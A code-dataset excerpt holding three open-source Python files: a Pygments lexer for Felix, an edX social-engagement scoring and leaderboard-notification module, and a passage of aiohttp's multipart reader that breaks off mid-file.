repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
wangjun/wakatime | wakatime/packages/pygments_py3/pygments/lexers/felix.py | 72 | 9410 | # -*- coding: utf-8 -*-
"""
pygments.lexers.felix
~~~~~~~~~~~~~~~~~~~~~
Lexer for the Felix language.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, include, bygroups, default, words, \
combined
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation
__all__ = ['FelixLexer']
class FelixLexer(RegexLexer):
"""
For `Felix <http://www.felix-lang.org>`_ source code.
.. versionadded:: 1.2
"""
name = 'Felix'
aliases = ['felix', 'flx']
filenames = ['*.flx', '*.flxh']
mimetypes = ['text/x-felix']
preproc = (
'elif', 'else', 'endif', 'if', 'ifdef', 'ifndef',
)
keywords = (
'_', '_deref', 'all', 'as',
'assert', 'attempt', 'call', 'callback', 'case', 'caseno', 'cclass',
'code', 'compound', 'ctypes', 'do', 'done', 'downto', 'elif', 'else',
'endattempt', 'endcase', 'endif', 'endmatch', 'enum', 'except',
'exceptions', 'expect', 'finally', 'for', 'forall', 'forget', 'fork',
'functor', 'goto', 'ident', 'if', 'incomplete', 'inherit', 'instance',
'interface', 'jump', 'lambda', 'loop', 'match', 'module', 'namespace',
'new', 'noexpand', 'nonterm', 'obj', 'of', 'open', 'parse', 'raise',
'regexp', 'reglex', 'regmatch', 'rename', 'return', 'the', 'then',
'to', 'type', 'typecase', 'typedef', 'typematch', 'typeof', 'upto',
'when', 'whilst', 'with', 'yield',
)
keyword_directives = (
'_gc_pointer', '_gc_type', 'body', 'comment', 'const', 'export',
'header', 'inline', 'lval', 'macro', 'noinline', 'noreturn',
'package', 'private', 'pod', 'property', 'public', 'publish',
'requires', 'todo', 'virtual', 'use',
)
keyword_declarations = (
'def', 'let', 'ref', 'val', 'var',
)
keyword_types = (
'unit', 'void', 'any', 'bool',
'byte', 'offset',
'address', 'caddress', 'cvaddress', 'vaddress',
'tiny', 'short', 'int', 'long', 'vlong',
'utiny', 'ushort', 'vshort', 'uint', 'ulong', 'uvlong',
'int8', 'int16', 'int32', 'int64',
'uint8', 'uint16', 'uint32', 'uint64',
'float', 'double', 'ldouble',
'complex', 'dcomplex', 'lcomplex',
'imaginary', 'dimaginary', 'limaginary',
'char', 'wchar', 'uchar',
'charp', 'charcp', 'ucharp', 'ucharcp',
'string', 'wstring', 'ustring',
'cont',
'array', 'varray', 'list',
'lvalue', 'opt', 'slice',
)
keyword_constants = (
'false', 'true',
)
operator_words = (
'and', 'not', 'in', 'is', 'isin', 'or', 'xor',
)
name_builtins = (
'_svc', 'while',
)
name_pseudo = (
'root', 'self', 'this',
)
decimal_suffixes = '([tTsSiIlLvV]|ll|LL|([iIuU])(8|16|32|64))?'
tokens = {
'root': [
include('whitespace'),
# Keywords
(words(('axiom', 'ctor', 'fun', 'gen', 'proc', 'reduce',
'union'), suffix=r'\b'),
Keyword, 'funcname'),
(words(('class', 'cclass', 'cstruct', 'obj', 'struct'), suffix=r'\b'),
Keyword, 'classname'),
(r'(instance|module|typeclass)\b', Keyword, 'modulename'),
(words(keywords, suffix=r'\b'), Keyword),
(words(keyword_directives, suffix=r'\b'), Name.Decorator),
(words(keyword_declarations, suffix=r'\b'), Keyword.Declaration),
(words(keyword_types, suffix=r'\b'), Keyword.Type),
(words(keyword_constants, suffix=r'\b'), Keyword.Constant),
# Operators
include('operators'),
# Float Literal
# -- Hex Float
(r'0[xX]([0-9a-fA-F_]*\.[0-9a-fA-F_]+|[0-9a-fA-F_]+)'
r'[pP][+\-]?[0-9_]+[lLfFdD]?', Number.Float),
# -- DecimalFloat
(r'[0-9_]+(\.[0-9_]+[eE][+\-]?[0-9_]+|'
r'\.[0-9_]*|[eE][+\-]?[0-9_]+)[lLfFdD]?', Number.Float),
(r'\.(0|[1-9][0-9_]*)([eE][+\-]?[0-9_]+)?[lLfFdD]?',
Number.Float),
# IntegerLiteral
# -- Binary
(r'0[Bb][01_]+%s' % decimal_suffixes, Number.Bin),
# -- Octal
(r'0[0-7_]+%s' % decimal_suffixes, Number.Oct),
# -- Hexadecimal
(r'0[xX][0-9a-fA-F_]+%s' % decimal_suffixes, Number.Hex),
# -- Decimal
(r'(0|[1-9][0-9_]*)%s' % decimal_suffixes, Number.Integer),
# Strings
('([rR][cC]?|[cC][rR])"""', String, 'tdqs'),
("([rR][cC]?|[cC][rR])'''", String, 'tsqs'),
('([rR][cC]?|[cC][rR])"', String, 'dqs'),
("([rR][cC]?|[cC][rR])'", String, 'sqs'),
('[cCfFqQwWuU]?"""', String, combined('stringescape', 'tdqs')),
("[cCfFqQwWuU]?'''", String, combined('stringescape', 'tsqs')),
('[cCfFqQwWuU]?"', String, combined('stringescape', 'dqs')),
("[cCfFqQwWuU]?'", String, combined('stringescape', 'sqs')),
# Punctuation
(r'[\[\]{}:(),;?]', Punctuation),
# Labels
(r'[a-zA-Z_]\w*:>', Name.Label),
# Identifiers
(r'(%s)\b' % '|'.join(name_builtins), Name.Builtin),
(r'(%s)\b' % '|'.join(name_pseudo), Name.Builtin.Pseudo),
(r'[a-zA-Z_]\w*', Name),
],
'whitespace': [
(r'\n', Text),
(r'\s+', Text),
include('comment'),
# Preprocessor
(r'#\s*if\s+0', Comment.Preproc, 'if0'),
(r'#', Comment.Preproc, 'macro'),
],
'operators': [
(r'(%s)\b' % '|'.join(operator_words), Operator.Word),
(r'!=|==|<<|>>|\|\||&&|[-~+/*%=<>&^|.$]', Operator),
],
'comment': [
(r'//(.*?)\n', Comment.Single),
(r'/[*]', Comment.Multiline, 'comment2'),
],
'comment2': [
(r'[^/*]', Comment.Multiline),
(r'/[*]', Comment.Multiline, '#push'),
(r'[*]/', Comment.Multiline, '#pop'),
(r'[/*]', Comment.Multiline),
],
'if0': [
(r'^\s*#if.*?(?<!\\)\n', Comment, '#push'),
(r'^\s*#endif.*?(?<!\\)\n', Comment, '#pop'),
(r'.*?\n', Comment),
],
'macro': [
include('comment'),
(r'(import|include)(\s+)(<[^>]*?>)',
bygroups(Comment.Preproc, Text, String), '#pop'),
(r'(import|include)(\s+)("[^"]*?")',
bygroups(Comment.Preproc, Text, String), '#pop'),
(r"(import|include)(\s+)('[^']*?')",
bygroups(Comment.Preproc, Text, String), '#pop'),
(r'[^/\n]+', Comment.Preproc),
# (r'/[*](.|\n)*?[*]/', Comment),
# (r'//.*?\n', Comment, '#pop'),
(r'/', Comment.Preproc),
(r'(?<=\\)\n', Comment.Preproc),
(r'\n', Comment.Preproc, '#pop'),
],
'funcname': [
include('whitespace'),
(r'[a-zA-Z_]\w*', Name.Function, '#pop'),
# anonymous functions
(r'(?=\()', Text, '#pop'),
],
'classname': [
include('whitespace'),
(r'[a-zA-Z_]\w*', Name.Class, '#pop'),
# anonymous classes
(r'(?=\{)', Text, '#pop'),
],
'modulename': [
include('whitespace'),
(r'\[', Punctuation, ('modulename2', 'tvarlist')),
default('modulename2'),
],
'modulename2': [
include('whitespace'),
(r'([a-zA-Z_]\w*)', Name.Namespace, '#pop:2'),
],
'tvarlist': [
include('whitespace'),
include('operators'),
(r'\[', Punctuation, '#push'),
(r'\]', Punctuation, '#pop'),
(r',', Punctuation),
(r'(with|where)\b', Keyword),
(r'[a-zA-Z_]\w*', Name),
],
'stringescape': [
(r'\\([\\abfnrtv"\']|\n|N\{.*?\}|u[a-fA-F0-9]{4}|'
r'U[a-fA-F0-9]{8}|x[a-fA-F0-9]{2}|[0-7]{1,3})', String.Escape)
],
'strings': [
(r'%(\([a-zA-Z0-9]+\))?[-#0 +]*([0-9]+|[*])?(\.([0-9]+|[*]))?'
'[hlL]?[diouxXeEfFgGcrs%]', String.Interpol),
(r'[^\\\'"%\n]+', String),
# quotes, percents and backslashes must be parsed one at a time
(r'[\'"\\]', String),
# unhandled string formatting sign
(r'%', String)
# newlines are an error (use "nl" state)
],
'nl': [
(r'\n', String)
],
'dqs': [
(r'"', String, '#pop'),
# included here again for raw strings
(r'\\\\|\\"|\\\n', String.Escape),
include('strings')
],
'sqs': [
(r"'", String, '#pop'),
# included here again for raw strings
(r"\\\\|\\'|\\\n", String.Escape),
include('strings')
],
'tdqs': [
(r'"""', String, '#pop'),
include('strings'),
include('nl')
],
'tsqs': [
(r"'''", String, '#pop'),
include('strings'),
include('nl')
],
}
| bsd-3-clause |
edx-solutions/discussion-edx-platform-extensions | social_engagement/engagement.py | 1 | 14753 | """
Business logic tier regarding social engagement scores
"""
import logging
import sys
from collections import defaultdict
from datetime import datetime
import pytz
from django.conf import settings
from django.db.models.signals import post_save, pre_save
from django.dispatch import receiver
from django.http import HttpRequest
import openedx.core.djangoapps.django_comment_common.comment_client as cc
from edx_notifications.data import NotificationMessage
from edx_notifications.lib.publisher import (get_notification_type,
publish_notification_to_user)
from edx_solutions_api_integration.utils import get_aggregate_exclusion_user_ids
from lms.djangoapps.discussion.rest_api.exceptions import (CommentNotFoundError,
ThreadNotFoundError)
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.django_comment_common.comment_client.user import get_course_social_stats
from openedx.core.djangoapps.django_comment_common.comment_client.utils import CommentClientRequestError
from requests.exceptions import ConnectionError
from xmodule.modulestore.django import modulestore
from .models import StudentSocialEngagementScore
log = logging.getLogger(__name__)
def update_course_engagement(course_id, compute_if_closed_course=False, course_descriptor=None):
"""
Compute and save engagement scores and stats for whole course.
"""
if not settings.FEATURES.get('ENABLE_SOCIAL_ENGAGEMENT', False):
return
course_key = course_id if isinstance(course_id, CourseKey) else CourseKey.from_string(course_id)
# cs_comment_service works is slash separated course_id strings
slash_course_id = str(course_key)
if not course_descriptor:
# it course descriptor was not passed in (as an optimization)
course_descriptor = modulestore().get_course(course_key)
if not course_descriptor:
# couldn't find course?!?
return
if not compute_if_closed_course and course_descriptor.end:
# if course is closed then don't bother. Note we can override this if we want to force update
now_utc = datetime.now(pytz.UTC)
if now_utc > course_descriptor.end:
log.info('update_user_engagement_score() is skipping because the course is closed...')
return
score_update_count = 0
try:
for user_id, social_stats in _get_course_social_stats(slash_course_id):
log.info('Updating social engagement score for user_id {} in course_key {}'.format(user_id, course_key))
current_score = _compute_social_engagement_score(social_stats)
StudentSocialEngagementScore.save_user_engagement_score(
course_key, user_id, current_score, social_stats
)
score_update_count += 1
except (CommentClientRequestError, ConnectionError) as error:
log.exception(error)
return score_update_count
def _get_course_social_stats(course_id):
""""
Yield user and user's stats for whole course from Forum API.
"""
stats = get_course_social_stats(course_id)
yield from stats.items()
def get_social_metric_points():
"""
Get custom or default social metric points.
"""
return getattr(
settings,
'SOCIAL_METRIC_POINTS',
{
'num_threads': 10,
'num_comments': 15,
'num_replies': 15,
'num_upvotes': 25,
'num_thread_followers': 5,
'num_comments_generated': 15,
}
)
def _compute_social_engagement_score(social_metrics):
"""
For a list of social_stats, compute the social score
"""
social_metric_points = get_social_metric_points()
social_total = 0
for key, val in social_metric_points.items():
social_total += social_metrics.get(key, 0) * val
return social_total
#
# Support for Notifications, these two receivers should actually be migrated into a new Leaderboard django app.
# For now, put the business logic here, but it is pretty decoupled through event signaling
# so we should be able to move these files easily when we are able to do so
#
@receiver(pre_save, sender=StudentSocialEngagementScore)
def handle_progress_pre_save_signal(sender, instance, **kwargs):
"""
Handle the pre-save ORM event on StudentSocialEngagementScore
"""
if settings.FEATURES['ENABLE_NOTIFICATIONS']:
# If notifications feature is enabled, then we need to get the user's
# rank before the save is made, so that we can compare it to
# after the save and see if the position changes
instance.presave_leaderboard_rank = StudentSocialEngagementScore.get_user_leaderboard_position(
instance.course_id,
user_id=instance.user.id,
exclude_users=get_aggregate_exclusion_user_ids(instance.course_id)
)['position']
@receiver(post_save, sender=StudentSocialEngagementScore)
def handle_progress_post_save_signal(sender, instance, **kwargs):
"""
Handle the pre-save ORM event on CourseModuleCompletions
"""
if settings.FEATURES['ENABLE_NOTIFICATIONS']:
# If notifications feature is enabled, then we need to get the user's
# rank before the save is made, so that we can compare it to
# after the save and see if the position changes
leaderboard_rank = StudentSocialEngagementScore.get_user_leaderboard_position(
instance.course_id,
user_id=instance.user.id,
exclude_users=get_aggregate_exclusion_user_ids(instance.course_id)
)['position']
if leaderboard_rank == 0:
# quick escape when user is not in the leaderboard
# which means rank = 0. Trouble is 0 < 3, so unfortunately
# the semantics around 0 don't match the logic below
return
# logic for Notification trigger is when a user enters into the Leaderboard
leaderboard_size = getattr(settings, 'LEADERBOARD_SIZE', 3)
presave_leaderboard_rank = instance.presave_leaderboard_rank if instance.presave_leaderboard_rank else sys.maxsize
if leaderboard_rank <= leaderboard_size and presave_leaderboard_rank > leaderboard_size:
try:
notification_msg = NotificationMessage(
msg_type=get_notification_type('open-edx.lms.leaderboard.engagement.rank-changed'),
namespace=str(instance.course_id),
payload={
'_schema_version': '1',
'rank': leaderboard_rank,
'leaderboard_name': 'Engagement',
}
)
#
# add in all the context parameters we'll need to
# generate a URL back to the website that will
# present the new course announcement
#
# IMPORTANT: This can be changed to msg.add_click_link() if we
# have a particular URL that we wish to use. In the initial use case,
# we need to make the link point to a different front end website
# so we need to resolve these links at dispatch time
#
notification_msg.add_click_link_params({
'course_id': str(instance.course_id),
})
publish_notification_to_user(int(instance.user.id), notification_msg)
except Exception as ex:
# Notifications are never critical, so we don't want to disrupt any
# other logic processing. So log and continue.
log.exception(ex)
def get_involved_users_in_thread(request, thread):
"""
Compute all the users involved in the children of a specific thread.
"""
params = {"thread_id": thread.id, "page_size": 100}
is_question = getattr(thread, "thread_type", None) == "question"
author_id = getattr(thread, 'user_id', None)
results = _detail_results_factory()
if is_question:
# get users of the non-endorsed comments in thread
params.update({"endorsed": False})
_get_details_for_deletion(_get_request(request, params), results=results, is_thread=True)
# get users of the endorsed comments in thread
if getattr(thread, 'has_endorsed', False):
params.update({"endorsed": True})
_get_details_for_deletion(_get_request(request, params), results=results, is_thread=True)
else:
_get_details_for_deletion(_get_request(request, params), results=results, is_thread=True)
users = results['users']
if author_id:
users[author_id]['num_upvotes'] += thread.votes.get('count', 0)
users[author_id]['num_threads'] += 1
users[author_id]['num_comments_generated'] += results['all_comments']
users[author_id]['num_thread_followers'] += thread.get_num_followers()
if thread.abuse_flaggers:
users[author_id]['num_flagged'] += 1
return users
def get_involved_users_in_comment(request, comment):
"""
Method used to extract the involved users in the comment.
This method also returns the creator of the post.
"""
params = {"page_size": 100}
comment_author_id = getattr(comment, 'user_id', None)
thread_author_id = None
if hasattr(comment, 'thread_id'):
thread_author_id = _get_author_of_thread(comment.thread_id)
results = _get_details_for_deletion(_get_request(request, params), comment.id, nested=True)
users = results['users']
if comment_author_id:
users[comment_author_id]['num_upvotes'] += comment.votes.get('count', 0)
if getattr(comment, 'parent_id', None):
# It's a reply.
users[comment_author_id]['num_replies'] += 1
else:
# It's a comment.
users[comment_author_id]['num_comments'] += 1
if comment.abuse_flaggers:
users[comment_author_id]['num_flagged'] += 1
if thread_author_id:
users[thread_author_id]['num_comments_generated'] += results['replies'] + 1
return users
def _detail_results_factory():
"""
Helper method to maintain organized result structure while getting involved users.
"""
return {
'replies': 0,
'all_comments': 0,
'users': defaultdict(lambda: defaultdict(int)),
}
def _get_users_in_thread(request):
from lms.djangoapps.discussion.rest_api.views import CommentViewSet
users = set()
response_page = 1
has_results = True
while has_results:
try:
params = {"page": response_page}
response = CommentViewSet().list(
_get_request(request, params)
)
for comment in response.data["results"]:
users.add(comment["author"])
if comment["child_count"] > 0:
users.update(_get_users_in_comment(request, comment["id"]))
has_results = response.data["pagination"]["next"]
response_page += 1
except (ThreadNotFoundError, InvalidKeyError):
return users
return users
def _get_users_in_comment(request, comment_id):
from lms.djangoapps.discussion.rest_api.views import CommentViewSet
users = set()
response_page = 1
has_results = True
while has_results:
try:
response = CommentViewSet().retrieve(_get_request(request, {"page": response_page}), comment_id)
for comment in response.data["results"]:
users.add(comment["author"])
if comment["child_count"] > 0:
users.update(_get_users_in_comment(request, comment["id"]))
has_results = response.data["pagination"]["next"]
response_page += 1
except (ThreadNotFoundError, InvalidKeyError):
return users
return users
def _get_request(incoming_request, params):
request = HttpRequest()
request.method = 'GET'
request.user = incoming_request.user
request.META = incoming_request.META.copy()
request.GET = incoming_request.GET.copy()
request.GET.update(params)
return request
def _get_author_of_comment(parent_id):
comment = cc.Comment.find(parent_id)
if comment and hasattr(comment, 'user_id'):
return comment.user_id
def _get_author_of_thread(thread_id):
thread = cc.Thread.find(thread_id)
if thread and hasattr(thread, 'user_id'):
return thread.user_id
def _get_details_for_deletion(request, comment_id=None, results=None, nested=False, is_thread=False):
"""
Get details of comment or thread and related users that are required for deletion purposes.
"""
if not results:
results = _detail_results_factory()
for page, response in enumerate(_get_paginated_results(request, comment_id, is_thread)):
if page == 0:
results['all_comments'] += response.data['pagination']['count']
if results['replies'] == 0:
results['replies'] = response.data['pagination']['count']
for comment in response.data['results']:
_extract_stats_from_comment(request, comment, results, nested)
return results
def _get_paginated_results(request, comment_id, is_thread):
"""
Yield paginated comments of comment or thread.
"""
from lms.djangoapps.discussion.rest_api.views import CommentViewSet
response_page = 1
has_next = True
while has_next:
try:
if is_thread:
response = CommentViewSet().list(_get_request(request, {"page": response_page}))
else:
response = CommentViewSet().retrieve(_get_request(request, {"page": response_page}), comment_id)
except (ThreadNotFoundError, CommentNotFoundError, InvalidKeyError):
raise StopIteration
has_next = response.data["pagination"]["next"]
response_page += 1
yield response
def _extract_stats_from_comment(request, comment, results, nested):
"""
Extract results from comment and its nested comments.
"""
user_id = comment.serializer.instance['user_id']
if not nested:
results['users'][user_id]['num_comments'] += 1
else:
results['users'][user_id]['num_replies'] += 1
results['users'][user_id]['num_upvotes'] += comment['vote_count']
if comment.serializer.instance['abuse_flaggers']:
results['users'][user_id]['num_flagged'] += 1
if comment['child_count'] > 0:
_get_details_for_deletion(request, comment['id'], results, nested=True)
| agpl-3.0 |
vaskalas/aiohttp | aiohttp/multipart.py | 3 | 32102 | import asyncio
import binascii
import base64
import json
import io
import mimetypes
import os
import re
import uuid
import warnings
import zlib
from urllib.parse import quote, unquote, urlencode, parse_qsl
from collections import deque, Mapping, Sequence
from pathlib import Path
from multidict import CIMultiDict
from .helpers import parse_mimetype
from .protocol import HttpParser
from .hdrs import (
CONTENT_DISPOSITION,
CONTENT_ENCODING,
CONTENT_LENGTH,
CONTENT_TRANSFER_ENCODING,
CONTENT_TYPE
)
__all__ = ('MultipartReader', 'MultipartWriter',
'BodyPartReader', 'BodyPartWriter',
'BadContentDispositionHeader', 'BadContentDispositionParam',
'parse_content_disposition', 'content_disposition_filename')
CHAR = set(chr(i) for i in range(0, 128))
CTL = set(chr(i) for i in range(0, 32)) | {chr(127), }
SEPARATORS = {'(', ')', '<', '>', '@', ',', ';', ':', '\\', '"', '/', '[', ']',
'?', '=', '{', '}', ' ', chr(9)}
TOKEN = CHAR ^ CTL ^ SEPARATORS
class BadContentDispositionHeader(RuntimeWarning):
pass
class BadContentDispositionParam(RuntimeWarning):
pass
def parse_content_disposition(header):
def is_token(string):
return string and TOKEN >= set(string)
def is_quoted(string):
return string[0] == string[-1] == '"'
def is_rfc5987(string):
return is_token(string) and string.count("'") == 2
def is_extended_param(string):
return string.endswith('*')
def is_continuous_param(string):
pos = string.find('*') + 1
if not pos:
return False
substring = string[pos:-1] if string.endswith('*') else string[pos:]
return substring.isdigit()
def unescape(text, *, chars=''.join(map(re.escape, CHAR))):
return re.sub('\\\\([{}])'.format(chars), '\\1', text)
if not header:
return None, {}
disptype, *parts = header.split(';')
if not is_token(disptype):
warnings.warn(BadContentDispositionHeader(header))
return None, {}
params = {}
for item in parts:
if '=' not in item:
warnings.warn(BadContentDispositionHeader(header))
return None, {}
key, value = item.split('=', 1)
key = key.lower().strip()
value = value.lstrip()
if key in params:
warnings.warn(BadContentDispositionHeader(header))
return None, {}
if not is_token(key):
warnings.warn(BadContentDispositionParam(item))
continue
elif is_continuous_param(key):
if is_quoted(value):
value = unescape(value[1:-1])
elif not is_token(value):
warnings.warn(BadContentDispositionParam(item))
continue
elif is_extended_param(key):
if is_rfc5987(value):
encoding, _, value = value.split("'", 2)
encoding = encoding or 'utf-8'
else:
warnings.warn(BadContentDispositionParam(item))
continue
try:
value = unquote(value, encoding, 'strict')
except UnicodeDecodeError: # pragma: nocover
warnings.warn(BadContentDispositionParam(item))
continue
else:
if is_quoted(value):
value = unescape(value[1:-1].lstrip('\\/'))
elif not is_token(value):
warnings.warn(BadContentDispositionHeader(header))
return None, {}
params[key] = value
return disptype.lower(), params
def content_disposition_filename(params):
if not params:
return None
elif 'filename*' in params:
return params['filename*']
elif 'filename' in params:
return params['filename']
else:
parts = []
fnparams = sorted((key, value)
for key, value in params.items()
if key.startswith('filename*'))
for num, (key, value) in enumerate(fnparams):
_, tail = key.split('*', 1)
if tail.endswith('*'):
tail = tail[:-1]
if tail == str(num):
parts.append(value)
else:
break
if not parts:
return None
value = ''.join(parts)
if "'" in value:
encoding, _, value = value.split("'", 2)
encoding = encoding or 'utf-8'
return unquote(value, encoding, 'strict')
return value
class MultipartResponseWrapper(object):
"""Wrapper around the :class:`MultipartBodyReader` to take care about
underlying connection and close it when it needs in."""
def __init__(self, resp, stream):
self.resp = resp
self.stream = stream
@asyncio.coroutine
def __aiter__(self):
return self
@asyncio.coroutine
def __anext__(self):
part = yield from self.next()
if part is None:
raise StopAsyncIteration # NOQA
return part
def at_eof(self):
"""Returns ``True`` when all response data had been read.
:rtype: bool
"""
return self.resp.content.at_eof()
@asyncio.coroutine
def next(self):
"""Emits next multipart reader object."""
item = yield from self.stream.next()
if self.stream.at_eof():
yield from self.release()
return item
@asyncio.coroutine
def release(self):
"""Releases the connection gracefully, reading all the content
to the void."""
yield from self.resp.release()
class BodyPartReader(object):
"""Multipart reader for single body part."""
chunk_size = 8192
def __init__(self, boundary, headers, content):
self.headers = headers
self._boundary = boundary
self._content = content
self._at_eof = False
length = self.headers.get(CONTENT_LENGTH, None)
self._length = int(length) if length is not None else None
self._read_bytes = 0
self._unread = deque()
self._prev_chunk = None
self._content_eof = 0
@asyncio.coroutine
def __aiter__(self):
return self
@asyncio.coroutine
def __anext__(self):
part = yield from self.next()
if part is None:
raise StopAsyncIteration # NOQA
return part
@asyncio.coroutine
def next(self):
item = yield from self.read()
if not item:
return None
return item
@asyncio.coroutine
def read(self, *, decode=False):
"""Reads body part data.
:param bool decode: Decodes data following by encoding
method from `Content-Encoding` header. If it missed
data remains untouched
:rtype: bytearray
"""
if self._at_eof:
return b''
data = bytearray()
if self._length is None:
while not self._at_eof:
data.extend((yield from self.readline()))
else:
while not self._at_eof:
data.extend((yield from self.read_chunk(self.chunk_size)))
if decode:
return self.decode(data)
return data
@asyncio.coroutine
def read_chunk(self, size=chunk_size):
"""Reads body part content chunk of the specified size.
:param int size: chunk size
:rtype: bytearray
"""
if self._at_eof:
return b''
if self._length:
chunk = yield from self._read_chunk_from_length(size)
else:
chunk = yield from self._read_chunk_from_stream(size)
self._read_bytes += len(chunk)
if self._read_bytes == self._length:
self._at_eof = True
if self._at_eof:
assert b'\r\n' == (yield from self._content.readline()), \
'reader did not read all the data or it is malformed'
return chunk
@asyncio.coroutine
def _read_chunk_from_length(self, size):
"""Reads body part content chunk of the specified size.
The body part must has `Content-Length` header with proper value.
:param int size: chunk size
:rtype: bytearray
"""
assert self._length is not None, \
'Content-Length required for chunked read'
chunk_size = min(size, self._length - self._read_bytes)
chunk = yield from self._content.read(chunk_size)
return chunk
@asyncio.coroutine
def _read_chunk_from_stream(self, size):
"""Reads content chunk of body part with unknown length.
The `Content-Length` header for body part is not necessary.
:param int size: chunk size
:rtype: bytearray
"""
assert size >= len(self._boundary) + 2, \
'Chunk size must be greater or equal than boundary length + 2'
first_chunk = self._prev_chunk is None
if first_chunk:
self._prev_chunk = yield from self._content.read(size)
chunk = yield from self._content.read(size)
self._content_eof += int(self._content.at_eof())
assert self._content_eof < 3, "Reading after EOF"
window = self._prev_chunk + chunk
sub = b'\r\n' + self._boundary
if first_chunk:
idx = window.find(sub)
else:
idx = window.find(sub, max(0, len(self._prev_chunk) - len(sub)))
if idx >= 0:
# pushing boundary back to content
self._content.unread_data(window[idx:])
if size > idx:
self._prev_chunk = self._prev_chunk[:idx]
chunk = window[len(self._prev_chunk):idx]
if not chunk:
self._at_eof = True
if 0 < len(chunk) < len(sub) and not self._content_eof:
self._prev_chunk += chunk
self._at_eof = False
return b''
result = self._prev_chunk
self._prev_chunk = chunk
return result
@asyncio.coroutine
def readline(self):
"""Reads body part by line by line.
:rtype: bytearray
"""
if self._at_eof:
return b''
if self._unread:
line = self._unread.popleft()
else:
line = yield from self._content.readline()
if line.startswith(self._boundary):
# the very last boundary may not come with \r\n,
# so set single rules for everyone
sline = line.rstrip(b'\r\n')
boundary = self._boundary
last_boundary = self._boundary + b'--'
# ensure that we read exactly the boundary, not something alike
if sline == boundary or sline == last_boundary:
self._at_eof = True
self._unread.append(line)
return b''
else:
next_line = yield from self._content.readline()
if next_line.startswith(self._boundary):
line = line[:-2] # strip CRLF but only once
self._unread.append(next_line)
return line
@asyncio.coroutine
def release(self):
"""Lke :meth:`read`, but reads all the data to the void.
:rtype: None
"""
if self._at_eof:
return
if self._length is None:
while not self._at_eof:
yield from self.readline()
else:
while not self._at_eof:
yield from self.read_chunk(self.chunk_size)
@asyncio.coroutine
def text(self, *, encoding=None):
"""Lke :meth:`read`, but assumes that body part contains text data.
:param str encoding: Custom text encoding. Overrides specified
in charset param of `Content-Type` header
:rtype: str
"""
data = yield from self.read(decode=True)
encoding = encoding or self.get_charset(default='latin1')
return data.decode(encoding)
@asyncio.coroutine
def json(self, *, encoding=None):
"""Lke :meth:`read`, but assumes that body parts contains JSON data.
:param str encoding: Custom JSON encoding. Overrides specified
in charset param of `Content-Type` header
"""
data = yield from self.read(decode=True)
if not data:
return None
encoding = encoding or self.get_charset(default='utf-8')
return json.loads(data.decode(encoding))
@asyncio.coroutine
def form(self, *, encoding=None):
"""Lke :meth:`read`, but assumes that body parts contains form
urlencoded data.
:param str encoding: Custom form encoding. Overrides specified
in charset param of `Content-Type` header
"""
data = yield from self.read(decode=True)
if not data:
return None
encoding = encoding or self.get_charset(default='utf-8')
return parse_qsl(data.rstrip().decode(encoding), encoding=encoding)
def at_eof(self):
"""Returns ``True`` if the boundary was reached or
``False`` otherwise.
:rtype: bool
"""
return self._at_eof
def decode(self, data):
"""Decodes data according the specified `Content-Encoding`
or `Content-Transfer-Encoding` headers value.
Supports ``gzip``, ``deflate`` and ``identity`` encodings for
`Content-Encoding` header.
Supports ``base64``, ``quoted-printable`` encodings for
`Content-Transfer-Encoding` header.
:param bytearray data: Data to decode.
:raises: :exc:`RuntimeError` - if encoding is unknown.
:rtype: bytes
"""
if CONTENT_TRANSFER_ENCODING in self.headers:
data = self._decode_content_transfer(data)
if CONTENT_ENCODING in self.headers:
return self._decode_content(data)
return data
def _decode_content(self, data):
encoding = self.headers[CONTENT_ENCODING].lower()
if encoding == 'deflate':
return zlib.decompress(data, -zlib.MAX_WBITS)
elif encoding == 'gzip':
return zlib.decompress(data, 16 + zlib.MAX_WBITS)
elif encoding == 'identity':
return data
else:
raise RuntimeError('unknown content encoding: {}'.format(encoding))
def _decode_content_transfer(self, data):
encoding = self.headers[CONTENT_TRANSFER_ENCODING].lower()
if encoding == 'base64':
return base64.b64decode(data)
elif encoding == 'quoted-printable':
return binascii.a2b_qp(data)
else:
raise RuntimeError('unknown content transfer encoding: {}'
''.format(encoding))
def get_charset(self, default=None):
"""Returns charset parameter from ``Content-Type`` header or default.
"""
ctype = self.headers.get(CONTENT_TYPE, '')
*_, params = parse_mimetype(ctype)
return params.get('charset', default)
@property
def filename(self):
"""Returns filename specified in Content-Disposition header or ``None``
if missed or header is malformed."""
_, params = parse_content_disposition(
self.headers.get(CONTENT_DISPOSITION))
return content_disposition_filename(params)
class MultipartReader(object):
"""Multipart body reader."""
#: Response wrapper, used when multipart readers constructs from response.
response_wrapper_cls = MultipartResponseWrapper
#: Multipart reader class, used to handle multipart/* body parts.
#: None points to type(self)
multipart_reader_cls = None
#: Body part reader class for non multipart/* content types.
part_reader_cls = BodyPartReader
def __init__(self, headers, content):
self.headers = headers
self._boundary = ('--' + self._get_boundary()).encode()
self._content = content
self._last_part = None
self._at_eof = False
self._at_bof = True
self._unread = []
@asyncio.coroutine
def __aiter__(self):
return self
@asyncio.coroutine
def __anext__(self):
part = yield from self.next()
if part is None:
raise StopAsyncIteration # NOQA
return part
@classmethod
def from_response(cls, response):
"""Constructs reader instance from HTTP response.
:param response: :class:`~aiohttp.client.ClientResponse` instance
"""
obj = cls.response_wrapper_cls(response, cls(response.headers,
response.content))
return obj
def at_eof(self):
"""Returns ``True`` if the final boundary was reached or
``False`` otherwise.
:rtype: bool
"""
return self._at_eof
@asyncio.coroutine
def next(self):
"""Emits the next multipart body part."""
# So, if we're at BOF, we need to skip till the boundary.
if self._at_eof:
return
yield from self._maybe_release_last_part()
if self._at_bof:
yield from self._read_until_first_boundary()
self._at_bof = False
else:
yield from self._read_boundary()
if self._at_eof: # we just read the last boundary, nothing to do there
return
self._last_part = yield from self.fetch_next_part()
return self._last_part
@asyncio.coroutine
def release(self):
"""Reads all the body parts to the void till the final boundary."""
while not self._at_eof:
item = yield from self.next()
if item is None:
break
yield from item.release()
@asyncio.coroutine
def fetch_next_part(self):
"""Returns the next body part reader."""
headers = yield from self._read_headers()
return self._get_part_reader(headers)
def _get_part_reader(self, headers):
"""Dispatches the response by the `Content-Type` header, returning
suitable reader instance.
